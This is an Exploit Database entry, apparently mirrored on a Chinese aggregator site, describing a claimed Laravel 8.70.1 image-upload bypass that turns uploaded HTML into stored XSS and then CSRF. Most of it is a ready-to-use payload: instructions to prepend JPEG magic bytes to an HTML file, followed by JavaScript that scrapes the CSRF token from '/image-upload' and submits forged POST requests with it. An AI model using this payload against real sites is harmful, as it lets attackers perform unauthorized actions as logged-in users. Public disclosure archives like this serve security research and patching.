PHP Laravel 8.70.1 – Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)

• Exploit Database
• 15 阅读

• 作者： Hosein Vita
  日期： 2021-11-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50525/

• # Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
  # Date: 14/11/2021
  # Exploit Author: Hosein Vita
  # Vendor Homepage: https://laravel.com/
  # Software Link: https://laravel.com/docs/4.2
  # Version: Laravel Framework 8.70.1
  # Tested on: Windows/Linux
  
  # Description: We can bypass laravel image file upload functionality to upload arbitary files on the web server
  # which let us run arbitary javascript and bypass the csrf token , For more information read this one https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b
  
  # Steps to reproduce:
  1- Use HxD tool and add FF D8 FF E0 at the very begining of your file
  2- Use code below to bypass csrf token
  
  ÿØÿà<html>
  <head>
  <title>Laravel Csrf Bypass</title>
  </head>
  <body>
  <script>
  function submitFormWithTokenJS(token) {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", POST_URL, true);
  
  // Send the proper header information along with the request
  xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  
  // This is for debugging and can be removed
  xhr.onreadystatechange = function() {
  if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
  console.log(xhr.responseText);
  }
  }
  	//
  xhr.send("_token=" + token + "&desiredParameter=desiredValue");
  }
  
  function getTokenJS() {
  var xhr = new XMLHttpRequest();
  // This tels it to return it as a HTML document
  xhr.responseType = "document";
  // true on the end of here makes the call asynchronous
  	//Edit the path as you want
  xhr.open("GET", "/image-upload", true);
  xhr.onload = function (e) {
  if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
  // Get the document from the response
  page = xhr.response
  // Get the input element
  input = page.getElementsByTagName("input")[0];
  // Show the token
  alert("The token is: " + input.value);
  // Use the token to submit the form
  submitFormWithTokenJS(input.value);
  }
  };
  // Make the request
  xhr.send(null);
  }
  getTokenJS();
  
  var POST_URL="/"
  getTokenJS();
  
  </script>
  </html>
  
  3- Save it as Html file and upload it.